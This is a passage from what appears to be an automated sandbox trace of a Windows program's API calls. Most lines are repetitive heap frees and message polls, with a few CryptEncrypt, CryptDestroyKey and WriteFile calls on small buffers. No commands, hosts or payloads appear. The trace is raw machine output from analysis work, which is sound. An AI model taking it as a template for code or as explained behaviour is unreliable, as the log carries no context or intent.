hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0151.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0151.243] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0151.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0151.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0151.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa420 | out: hHeap=0x2af0000) returned 1 [0151.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4b0 | out: hHeap=0x2af0000) returned 1 [0151.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa408 | out: hHeap=0x2af0000) returned 1 [0151.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0151.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0151.243] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0151.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0151.243] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0151.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0151.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa378 | out: hHeap=0x2af0000) returned 1 [0151.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0151.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa258 | out: hHeap=0x2af0000) returned 1 [0151.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0151.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0151.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0151.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0151.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0151.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0151.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0151.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0151.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0151.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0151.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0151.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0151.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa450 | out: hHeap=0x2af0000) returned 1 [0151.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa528 | out: hHeap=0x2af0000) returned 1 [0151.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa330 | out: hHeap=0x2af0000) returned 1 [0151.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0151.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0151.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0151.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0151.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0151.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0151.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4f8 | out: hHeap=0x2af0000) returned 1 [0151.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0151.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa438 | out: hHeap=0x2af0000) returned 1 [0151.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0151.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0151.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0151.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3d8 | out: hHeap=0x2af0000) returned 1 [0151.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa438 | out: hHeap=0x2af0000) returned 1 [0151.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3c0 | out: hHeap=0x2af0000) returned 1 [0151.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0151.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0151.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0151.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa330 | out: hHeap=0x2af0000) returned 1 [0151.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0151.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0151.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa510 | out: hHeap=0x2af0000) returned 1 [0151.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4f8 | out: hHeap=0x2af0000) returned 1 [0151.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0151.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0151.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0151.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0151.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3f0 | out: hHeap=0x2af0000) returned 1 [0151.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa438 | out: hHeap=0x2af0000) returned 1 [0151.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4b0 | out: hHeap=0x2af0000) returned 1 [0151.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0151.245] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0151.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2a0 | out: hHeap=0x2af0000) returned 1 [0151.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0151.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4b0 | out: hHeap=0x2af0000) returned 1 [0151.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0151.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4b0 | out: hHeap=0x2af0000) returned 1 [0151.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0151.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa438 | out: hHeap=0x2af0000) returned 1 [0151.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0151.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4b0 | out: hHeap=0x2af0000) returned 1 [0151.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0151.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3f0 | out: hHeap=0x2af0000) returned 1 [0151.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0151.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa438 | out: hHeap=0x2af0000) returned 1 [0151.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0151.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4b0 | out: hHeap=0x2af0000) returned 1 [0151.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0151.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4f8 | out: hHeap=0x2af0000) returned 1 [0151.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0151.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3f0 | out: hHeap=0x2af0000) returned 1 [0151.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0151.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa330 | out: hHeap=0x2af0000) returned 1 [0151.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2b8 | out: hHeap=0x2af0000) returned 1 [0151.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0151.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3f0 | out: hHeap=0x2af0000) returned 1 [0151.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0151.246] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0151.246] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaa510, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0151.247] CryptEncrypt (in: hKey=0x9e1fb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x8) returned 1 [0151.247] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.247] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.247] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.247] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.247] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0151.247] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.247] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.247] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0151.247] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0151.247] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0151.247] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0151.247] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0151.247] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0151.247] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0151.247] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaa420, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0151.247] CryptEncrypt (in: hKey=0x9e1fb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a71b98*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x8 | out: pbData=0x2a71b98*, pdwDataLen=0x8cef60*=0x8) returned 1 [0151.247] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.247] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.247] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.247] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.248] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.248] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.248] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.248] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0151.248] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0151.248] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0151.248] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0151.248] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0151.252] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0151.252] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0151.252] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0151.252] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0151.252] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0151.252] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0151.252] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0151.252] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0151.252] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0151.252] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0151.252] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0151.252] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0151.252] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0151.252] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0151.252] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.252] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.252] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.252] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.252] WriteFile (in: hFile=0x4b0, lpBuffer=0x2a72648*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a72648*, lpNumberOfBytesWritten=0x8cf5e4*=0x8, lpOverlapped=0x0) returned 1 [0151.253] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.253] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.253] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0151.253] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0151.254] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0151.254] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0151.254] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0151.254] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0151.254] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0151.254] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0151.254] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0151.254] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0151.254] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0151.254] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0151.254] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aa9f58, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0151.254] CryptDestroyKey (hKey=0x9e1fb8) returned 1 [0151.254] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0151.254] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0151.254] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0151.254] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0151.254] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0151.254] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0151.254] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0151.254] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0151.254] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0151.255] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0151.255] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0151.255] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0151.255] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0151.255] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0151.255] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0151.255] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0151.255] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0151.255] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0151.255] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0151.255] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0151.255] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0151.255] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0151.255] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0151.255] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.255] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0151.255] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, 